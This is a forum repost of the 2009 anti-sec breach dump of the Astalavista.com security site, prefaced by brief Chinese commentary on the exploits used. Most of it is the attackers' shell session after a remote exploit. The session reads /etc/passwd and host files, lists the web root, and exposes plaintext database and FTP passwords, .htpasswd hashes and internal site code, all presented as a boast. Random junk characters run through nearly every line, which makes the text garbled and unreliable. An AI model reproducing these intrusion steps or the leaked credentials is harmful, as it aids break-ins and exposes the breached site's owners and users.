中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]

作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
$ c, x2 u- Y" [% _2 l
, v8 n3 x% B1 q[root@front3 ~]# curl -I litespeedtech.com9 h5 t' ~3 d; Z  K, X6 Y1 j" ?
HTTP/1.1 200 OK
/ x+ V+ M7 p. }Date: Fri, 05 Jun 2009 22:54:51 GMT
0 o, {9 U% `: CServer: LiteSpeed
% G% q5 n* _6 l2 T* ]/ ~* X. o$ }6 v0 K' H0 u- u. s7 i- ?4 m
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
. Z& _( }* B, |0 t2 F0 U5 @  D
2 C1 C+ F$ x$ ]有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。/ [; i2 a: d  r9 Z1 k* t+ \
! A( A( v+ l1 ^+ ~( f0 a
% T6 |3 ?0 Y- [5 F5 u, o0 l+ i
/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
7 J3 E! l& K+ _, L/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
9 s8 U' F2 w: p( A2 s/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
0 K; s- n& ]5 G0 T; q, g\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /, R" p7 r- b: m; v, r
        \/        \/                 \/        \/       \/                     \/                 \/
& X$ {* `; `# n! L                                  The Hacking & Security Community/ j. ]! [7 `6 a) T) V% [
[+] Founded in 1997 by a hacker computer enthusiast
- j* d7 B1 c/ }; y8 J: m1 H( x[-] Exposed in 2009 by anti-sec group
4 d% i# F  `# w) m; |. X: J/ U( N4 a% G- Q; A2 V7 Z! e  @* Z
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
2 }2 X. z( G* w5 {0 x3 r; g! T) }>> 03. Who’s behind the site?
# y+ N8 p) v# y* A. e  P2 B! ^% ~>>
4 u9 J' ]3 I! z& j& f>> A team of security and IT professionals, and a countless number of contributors from all over the world.
2 w, c, x# O( J# ~) s, B& x+ i" }, L0 f, [5 Q! ]
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
+ I2 `0 y1 z9 O% S1 q. }>>4 o: r( V1 _) r! N8 n# J
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
5 l% Q. Y- Q* U5 J; rmilitary institutions.* q: m" i4 g3 I, J3 T
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.# r1 W2 k7 {7 W
5 O* T  o0 o" F. g8 ?# ~7 U% ~; @
Why has Astalavista been targeted?
3 h- U1 B  Y& e1 D! @; f! X3 S3 C4 E2 \) ^* r
Other than the fact that they are not doing any of this for the “community” but# H% e7 }" a$ p2 z6 {/ O
for the money, they spread exploits for kids, claim to be a security community
$ D. s  c% B: E2 E6 \* g(with no real sense of security on their own servers), and they charge you $6.66  Y" a% V0 d: E0 n  f4 T- U
per months to access a dead forum with a directory filled with public releases( _" f3 a# C( |9 b
and outdated / broken services.
; L' ~( L- i2 T6 x% I  }- l( U* ~, Z! u
We wanted to see how good that “team of security and IT professionals” really is.+ \; r: U+ d, H

3 U5 Y3 Q& t. H8 w! d; ^" A  O% }Let’s begin.7 W  ?& m, g; |$ {3 D+ [
4 }- x  V% v5 G7 H2 s6 w/ a7 \8 \* c
anti-sec:~# ./g0tshell astalavista.com -p 80
' x/ X' x) [% x8 Q[+] Connecting to astalavista.com:808 Z: f3 K: F: Z  R# `' q2 a& }
[+] Grabbing banner…+ M2 ?9 O  N) _& a
LiteSpeed
, u8 Y! Y6 [4 x4 a$ \& J[+] Injecting shellcode…1 E: u  N" W- h0 ~
[-] Wait for it0 W9 T$ G# W) K/ r5 x

+ u$ \" n3 D, I- w. p2 ~% K* j[~] We g0tshell
! c' J: W) @8 f' s7 s; N! a) Runame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux$ V3 Z7 n1 t3 h( @
ID: uid=100(apache) gid=500(apache) groups=500(apache)2 _# N. G% j" S

8 u' i0 v; c6 d8 n. B& E4 Ush-3.2$ cat /etc/passwd
6 B$ @/ \% B/ {" nroot:x:0:0:root:/root:/bin/bash
2 [; I6 |6 d& C+ ~$ a% s4 Qbin:x:1:1:bin:/bin:/sbin/nologin% I- r( z- x& u" P
daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ ]# G/ Q3 H6 n. r8 ?adm:x:3:4:adm:/var/adm:/sbin/nologin
! @3 b" r5 K8 S; a& s: Hlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
% ]' L* T4 {; k3 J: r: Xsync:x:5:0:sync:/sbin:/bin/sync3 h& g4 b! J" ^1 H( n( Z! Q7 k
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown" d+ s1 [' R$ a) O6 ?$ r
halt:x:7:0:halt:/sbin:/sbin/halt" T% }) l* I" E0 z3 `/ j
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin# c9 n' U# S) A  C4 Q
news:x:9:13:news:/etc/news:% w0 p3 h" n" g
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin2 N/ d- \# W) z7 f
operator:x:11:0perator:/root:/sbin/nologin
/ N$ n5 N0 d" K7 ^$ B( ~1 Qgames:x:12:100:games:/usr/games:/sbin/nologin1 d# h- Y! A7 |- W: H/ f
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin; [3 ?, M: Q" s) k. w" M* t# K
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
$ a2 d- e& g: i" l, Onobody:x:99:99:Nobody:/:/sbin/nologin8 Q# Z2 H* N( k' V: z
rpm:x:37:37::/var/lib/rpm:/sbin/nologin! a( M; ^% C8 X" V3 z: K' X" v
dbus:x:81:81:System message bus:/:/sbin/nologin
, j! X& R8 O6 V, h$ q/ n! T& |' Inscd:x:28:28:NSCD Daemon:/:/sbin/nologin: c4 R; i3 f3 z5 ^  C
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin9 l3 k" j8 i7 e4 ~" [
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin7 j# c( y( R% z' b
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin& K# U2 @$ T0 Y* s+ L- j; S
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin: u$ V, s7 D) |7 u& I
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin) x, c! G8 A' W) u( U6 Q
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin' H: P  L, W/ O  _
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin# w& C, z4 U( J5 y# y+ p4 P/ b
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
$ e. S# z  F/ d3 ~" n* {7 tpcap:x:77:77::/var/arpwatch:/sbin/nologin# O; ~: F+ H, x! v
named:x:25:25:Named:/var/named:/sbin/nologin% O& L, O' H3 ~4 v, ?
apache:x:100:500::/var/www:/bin/false
7 s& d+ }  V& x0 [. j+ idiradmin:x:101:101::/usr/local/directadmin:/bin/bash
2 O0 q& b6 y3 a9 m# bmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
1 ?, T" T/ i7 G" I4 E% {; `webapps:x:500:501::/var/www/html:/bin/bash# I" H6 h9 j  E0 i# P
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
/ o/ ]9 Z$ W* `  z- T3 Radmin:x:501:502::/home/admin:/bin/bash
$ U& N4 J1 O! V/ O5 \3 qjon:x:502:503::/home/jon:/bin/bash* N# D$ ?  z* `* B
com:x:503:504::/home/com:/bin/bash, Q, J3 a7 `7 e1 _5 J8 p  J) M
ntp:x:38:38::/etc/ntp:/sbin/nologin8 |% `9 e: |4 n6 T5 x" B4 }6 L
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin2 p3 V7 T! m! n3 W! H
astanet:x:504:505::/home/astanet:/bin/bash- n' H* P( x! U
avahi:x:70:70:Avahi daemon:/:/sbin/nologin1 H$ j* v, H) d5 T' M7 t( O
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
, W' q) M- B: b3 S( F# [; L% R" T
sh-3.2$ cat /etc/hosts6 Q& X0 q  H/ R' g
# Do not remove the following line, or various programs& b$ n: f, u. g3 `2 i* G
# that require network functionality will fail.# S) P( m1 y* }- S1 _
127.0.0.1       localhost.localdomain   localhost
* e) q' d2 @  J* {& z$ ]( @/ k::1     localhost6.localdomain6 localhost64 l. ]9 P% H' I4 W! _
80.74.154.172           asta1.astalavistaserver.com
) N! O/ X' S) P6 G) E' E
3 x2 E+ J# x7 Q- @4 X- G+ ush-3.2$ pwd4 ~0 Y1 {! g1 r5 ^
/home/com/public_html7 g% V$ i3 g' m- j9 L6 l- @

! {3 h$ a  R, P$ ish-3.2$ ls -la5 `- r, D/ t2 A- A( m) q/ h
total 18460
2 {* p$ B/ p! b  ddrwxr-xr-x 30 com apache     4096 May 28 17:06 .& O7 n6 b1 `& r% n' q% s' L, x
drwx–x–x 11 com com        4096 Jun 25  2008 ..6 ~* {: D) T- M" l3 u" u/ ]
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin3 g3 E! S" T" V  {/ Y5 n% N4 g- E
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
! |; X" q2 k# g- adrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
% |. n6 S1 _' n, l" l- l) Mdrwxrwxrwx  2 com com        4096 May 19 00:50 config2 q+ B. j& L$ C# _- A
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core' d$ k6 u8 U# ~! B' X
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
" P" e3 U6 s1 kdrwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
" N3 \- ?2 E7 }% _drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo* w& s3 ^. l- ^7 C4 e( s, M/ t
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__: e. }/ f/ k! l) }
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php. M0 @" n- ?8 h! `
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
, Q  @' B/ h2 ~) J$ [drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor% I1 `6 U2 U3 ^8 t/ l3 M4 F; Y
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
# G2 B- s! L) T$ X6 ~drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
! M; f2 T  D  S$ ?; E4 v- |) F-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
# q, B+ X. X) [: |' c  O  Y-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak5 J' C7 r" p$ _& z, `$ F7 P8 \
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
9 i! H" t4 b9 j$ \8 l9 W: I4 ]drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool2 t9 i8 i, r1 @  m/ m; U) Y9 c: L
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
; n3 `. k: V9 Y8 |! e-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php$ h; a% Y8 a4 K
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer/ Z% v% b" l2 P# V- [
drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
; l4 G" M: M5 i% h5 g1 K& fdrwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
. [- ?1 Q0 D: A& Bdrwxrwxrwx 12 com com        4096 Jun  2 07:47 media
5 M. H# K& V8 n- l: a7 [9 J$ }drwxr-xr-x  8 com com        4096 May 11 12:48 modifications' C8 q. Y# M) T- O2 q) o
drwxr-xr-x 34 com com        4096 May 28 16:30 modules
/ l' g6 O; g( K& g/ n# Z! @$ p8 K' n% qdrwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin2 a5 v9 C+ I: V" |
drwxrwxr-x 22 com com        4096 May 28 17:06 _new% [" J0 d6 |2 o7 @" C% A
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
6 q& a. K4 k0 ]" w  m/ \8 y7 ldrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
. J1 ^6 w1 L' [* {$ o# i$ ~2 Tdrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
. |! C1 i9 }' ~! Q" `-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt- T' n, ?& t" o2 ~# h
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
/ |8 n, U3 e' W" R% _/ w, q4 l6 N: L-rw-r–r–  1 com com         223 Mar 30 15:32 test.php5 t4 y) T$ ~6 T% V4 e; {
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
; g* g8 k' n) Y% udrwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp6 s9 I, N8 b% `6 x/ E
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam6 N  z5 Y: ~- L& G9 M
& |" E) a$ h9 H6 c( m
sh-3.2$ head -20 index.php! s, E7 B# e, v! q- _/ D
<?php; X9 b; [  P9 J' q

9 o' S3 s0 l; X: q) @( q/**0 N: ]$ w( I3 S" _# Z
* The main page for the CMS
$ |: e' h& D; d( P* @copyright   CONTREXX CMS - COMVATION AG8 R7 v# F6 x  x$ Z( ?
* @author      Comvation Development Team
& F, n7 t) {% i& U3 _* @version     v1.0.9.10.1 stable7 V; d: t4 P! }  n+ Q* E, I; C
* @package        contrexx; p' A  ~3 w8 j, K2 a
* @subpackage    core3 e/ Y. M9 g  t7 c% G
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage4 s( j4 V1 r. b1 u) Z6 v3 v& ?5 w, s
* @since       v0.0.0.05 f' r2 R! u. p# ~
* @todo        Capitalize all class names in project8 z7 ~+ z  r9 X- ?6 {' o
* @uses        /config/configuration.php  Q- }: A. p: J7 k! H( ]
* @uses        /config/settings.php
) ?3 j5 \" I7 s. B+ u$ b* @uses        /config/version.php
  O0 X- D  @5 U- d7 _6 ^* @uses        /core/API.php
( u  L0 K, S" S' X5 S$ y* @uses        /core_modules/cache/index.class.php
( j7 h% i9 K! p' b* @uses        /core/error.class.php
- e& O0 }, ~+ a( I& q* @uses        /core_modules/banner/index.class.php5 p) F: K2 V- ^( s! ~* g  Y
* @uses        /core_modules/contact/index.class.php
4 Q) A6 C4 ~& p. g8 v: a  [0 f: q# E6 i$ F  P8 k
sh-3.2$ cd config/
& Z8 Y% j, ~; V! `  v* Nsh-3.2$ ls -la, B2 H8 r$ ^& w/ x" v) e+ _$ e) P
total 32
: M% F  @3 t* N2 c3 P7 R( pdrwxrwxrwx  2 com com    4096 May 19 00:50 .
5 `8 R/ A; V& w  ~8 _drwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 \5 ~' T0 X8 r( `
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
4 ^( }& o& ]" l-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php9 e$ ^  d5 w) }7 Q& k) m
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
+ Q- W" _; Q0 W6 V' H2 a, U-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php; K0 i5 I/ f# `6 ~) q  J

) \* V8 s. f1 V4 y+ {% Hsh-3.2$ cat configuration.php$ K5 C6 k" {1 ^, Q* K6 z+ i3 R; W
[snip]" S% q2 Y' l  y" q( |7 o4 G
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
3 `' K* ^- _9 G; W8 X6 Z3 @% y# R$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name8 Y* ^. Z1 P7 X" |$ T8 G$ D
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix4 h% ]7 I( _- m; J. a$ @7 G
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username0 X- k. H5 S* |9 J' P; ^
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
5 Z+ \. E2 B/ b0 }; P2 R% b* q$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
4 }, [5 P+ S- W5 a% x0 k$ v$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
8 o6 V: g8 ?* M% l[snip]
. t. O6 Y+ B6 @/ T$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
& D: J' ~& `  }0 I7 ?4 i; l# m$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode6 f% R! C$ ^3 e( P6 ?# K5 x5 O
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
8 c  a) k2 j: y$ D2 ~- m! W$_FTPCONFIG['port'] = 21; // Ftp remote port
: Q$ ], N+ o0 R/ b$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username5 Z2 U, B% N- w2 u& \
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password3 s* u5 J3 L5 B- C' t) N
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms& E1 s, y  t7 X+ ~' y
/ [3 e7 e5 f& T7 j4 z# r/ @
sh-3.2$ cd ..
% J0 c7 @" y/ b' n! [; h; Csh-3.2$ cd dvd/* Q4 L9 l9 T( w# {; I5 p4 i
sh-3.2$ ls -la
! A. f. G- l  @( rtotal 2913780( x1 J1 O7 {( O3 }/ m
drwxr-xr-x  2 com com          4096 Sep  9  2008 .9 a9 }3 ?0 S+ E& J6 h% h
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..
+ d# z$ p% h9 P-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar! ~7 z2 U8 h6 M5 V5 b( w- [
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
0 g' o* M4 |! P; m5 J-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar. ~4 {& E8 B7 N/ F& e, M
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
0 v% ^! o$ s* ^# s$ k2 ?! W& e' L7 A% |: Z- r+ s
sh-3.2$ cat .htaccess
% ?& M& f4 J3 B/ @) b0 O1 JauthType Basic5 u9 A5 H4 Y: c8 N4 {# K
authName DVD
1 T/ F3 x3 w% V0 Q% M* VauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
0 W' [$ D! [& e8 a/ ^0 l$ H* m% k5 Wrequire valid-user
- J/ z/ u! X9 S, ~; p& Q5 }
. M  {5 E& I  e* psh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd1 C1 I) \, o. p/ {9 Z% P2 Q  ]
DVDdownload:CRD8cuY6.MPT60 x; o0 h) U5 A# j2 W) O) Y
DVDdownload2:CR8a36.wluFMg/ r$ I2 i- X# B% A9 x

& Y8 v# R: A( N& O- B8 s8 E' @sh-3.2$ cat test.php3 d4 M7 {; t5 s* _. O
<?php
" a% s! I4 I7 E  }6 K4 i% T$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;: N4 L6 @" q  r* C' D8 @
$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));$ c# }$ I% u0 e4 a
echo $url;
8 D+ M4 V# ~2 l" N9 c! L- x# u- F?>
, `  k3 ]) X( N6 }+ x+ i5 l
) K5 H/ m! H  Y' @: H% O) Q' }  V' esh-3.2$ cd modifications/$ L: ^* t8 S* ~( y: Y2 U
sh-3.2$ ls -la
3 w* N& d+ g( f! y, Btotal 32
2 l2 ?) B/ o! @1 D* r4 S( vdrwxr-xr-x  8 com com    4096 May 11 12:48 .
# u$ C( z5 ~5 V: e; J) q7 {4 l0 qdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: r' @7 D% [( W( K) w  G9 \6 Kdrwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng% _$ o; |" K8 X1 a0 Z+ [
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
8 t" @4 |! e9 v, s. u/ Zdrwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
! r: W; B5 X( Z" i# Xdrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
  v1 Y+ i4 P& Q2 y2 P  u# U# R8 adrwxr-xr-x  2 com com    4096 Feb  2 19:33 search7 z" @- G( X' ^9 ~5 o0 d# ~9 R
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
: s+ V0 e9 Z* s4 x0 J7 X& @, D# m% Y3 e
sh-3.2$ ls -R6 t& W1 [7 k+ {% P
.:
( _% E% l7 z% L- c; jcom_avtng  cronjobs  onlinetools  pjirc  search  _tmp/ {7 V; U+ ^% v: y
2 k6 i5 z# p+ P7 p
./com_avtng:
4 J! x5 T- n) v# K8 b8 Havtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts) S( U: @' I5 w4 \7 k1 L

1 p& s6 ~* a* ?. ~. {- v./com_avtng/scripts:
- v% n& \1 t/ T2 P& G4 ]popunder.js
3 [# y; U$ H- A, U4 y, u1 y$ O0 Z/ d1 z* ^6 c$ l% `1 M
./cronjobs:
, W$ ^+ h4 q9 @1 t* _$ N/ T  ~exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp: l4 ~- o8 C% P3 S7 \% y. J& }

0 Q4 I0 z" J/ v/ d0 H1 ^' o8 {/ z1 u./cronjobs/tmp:
8 Y4 c$ r- u9 g9 E9 P3 Ycontrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv7 r6 ^1 J6 G  Y. i8 d

( M) A. v+ Z2 O8 b./onlinetools:; u$ x7 P' A0 f% ~5 ?% f
index.php# }. ^1 i8 c; W% r3 D, ~- q
- J. Y3 O' F" `1 O
./pjirc:* M& K* @# r( b+ A( d; ]; s
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt+ _" c& h3 I' j% w5 c$ L& t
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
) Z4 j  P% c* H2 G5 {0 A' U6 _background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
( s9 W& w( h& U1 Y! }# R2 y5 v# o' R8 S; A2 c; x  M
./pjirc/img:+ v$ Y8 D: O$ ]0 s; v7 R
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
, j4 n( \* P) N- Karbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
, y  [' u0 k+ O! ^+ Sverre-eau.gif
( l- n/ t( }: l& H5 M6 zargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  $ u0 h/ X$ _5 ~" \. N
verre-vin.gif
( m/ Q, c* P" j# L' Jballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
% `; [* n! a( u9 Fbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
0 s# o) \; m5 A8 B6 n* m. h
9 o- s: x: {0 `- Y9 i./pjirc/snd:
$ w5 l* O5 W  D7 R3 w" c- q1 D0 O) tbell2.au  ding.au
  }) p# i7 V: D2 k) c* v
* ?: m. ?% W! }) S: n4 R2 Z" }./search:
! j, j! h3 h/ N" fsearchEngines.php  search.php
. A: i1 S# _5 `7 a; n* {
' i: z: q3 G# O. L5 ]. d+ n: Q6 S- J./_tmp:
5 {9 ^7 c) R# a9 I; EdefaultPorts.php  defaultPorts.txt8 q# C; D* a6 @
2 S% [7 ]" O) j
sh-3.2$ cd cronjobs/
3 G% @5 l8 j) w3 }$ j9 X3 Qsh-3.2$ cat exploits.php* T2 J& w8 ?1 X
[snip]
1 k! K- ]( ?8 h; P$categories   = array();+ K( z  ~1 Q) H4 z
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;( W& K0 e- u0 u7 `. y/ j
$expolits     = file($milw0rmFile);; z. Z6 V% t- V
$comExploits  = array();
  g( [: `) Z8 @1 W: M/ T[snip]  l% f0 S; c9 X' z8 B  |
// manage data) k3 [+ P; \2 J) a' J: J
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
* U! f7 n' p1 x' Q7 F, s. f
- J% i% Z/ y, u) |    // get path and title) k4 M2 c7 C. S; S
    $expolits[$x] = trim($expolits[$x]);* U3 |4 K  p9 ^& U4 v' `9 ]$ |
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
4 n9 u/ P4 t* r7 y- V. Z    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);* ~+ n, b' }* {) N+ K9 ?2 U* ~

: q2 I+ Z* r5 t3 D    // check if file exists
; l7 |3 O% X5 q3 l. p+ S    if (file_exists($path)) {+ ^) w. h5 ~% U4 y8 c1 v# U
) M0 t9 p: l# _; l+ ~* |
        $text = file_get_contents($path);5 q# ?+ Y$ j6 E! v9 J* p0 S

4 V) b4 M$ L" o. h- {        // get content and date( N* ]8 Q5 |( t) ?
        //$text = htmlspecialchars($text, ENT_QUOTES);8 D  _9 j. _3 r6 X
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));9 C. ^  y) S7 m
        if ($tmptext != ”) {
% b% z% v8 c6 |9 A            $text = $tmptext;
/ |+ q- N5 A  N) k        } else {
, m2 c, o# q) k; D6 ]            $text = addslashes(htmlentities($text,  ENT_QUOTES));
3 O: N% v1 j7 a        }
. F& J+ ~3 V! p        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));! z0 @9 g2 q  Y7 j/ E& c
        $tmp  = explode('-', $date);
: u: X$ J0 ~1 E! k/ S        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));7 x( l; [, S3 V6 |) t/ B4 T6 r
        $cat  = getCategory ($path);
1 ]3 j6 w2 b. y3 Z        $ext  = pathinfo(basename($path));
! _- ?  U; a. l/ R! N4 H5 u( V        $ext  = $ext['extension'];
* G/ q5 ?+ a  O- t8 s# k        $qStr = ”9 {7 E. q7 ^- ]; e5 i
            SELECT  `id`2 W" r( e* r  e- Z% ^9 x+ R- v
            FROM    `contrexx_module_exploits`
9 I! V9 ]' D3 O2 A& ]            WHERE   `title`  =  ‘” . $title . “‘
/ ]0 J+ @- |1 p            AND     `date`   =  ‘” . $date . “‘0 x6 w; B* M' x% s% [4 \3 m, i9 O' p
        “;
) ~7 L9 p; h* K  {  }" @6 U        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
: \0 x$ `+ T! F* X; \5 r        $q = $_objDB->query($qStr);
1 O0 T' K7 r/ h% N
1 C$ K. d; _7 t- V" b/ |7 Q        if ($q->numRows() == 0) {
0 U5 P2 h9 J8 M1 o9 w/ U# A" J9 a& U, g
            // prepare array
3 K1 {" v, c* P" M            $comExploits[$x]['date']      = $date;
( x* k0 ^6 X2 P1 U- I  c1 w7 v            $comExploits[$x]['title']     = $title;
4 s7 A8 X" q% [* c            $comExploits[$x]['author']    = ‘milw0rm’;) |" ?4 |8 Z" {) o8 v
            $comExploits[$x]['text']      = $text;
" b/ Z! R2 C' ]/ p8 L+ ?            $comExploits[$x]['source']    = $ext;3 r& o3 {1 r2 b3 P& o
            $comExploits[$x]['url1']      = ”;
- }( E2 Z7 @9 H8 y5 K) `            $comExploits[$x]['url2']      = ”;
3 w. ?4 y6 i+ [4 ?" v* z+ e            $comExploits[$x]['catid']     = $cat;
1 S2 O8 _  _, Y# s            $comExploits[$x]['lang']      = ‘2′;
# _# E5 G1 |  q' j) @* r            $comExploits[$x]['userid']    = ‘12′;) R, l/ d; L7 q
            $comExploits[$x]['startdate'] = ‘0000-00-00′;
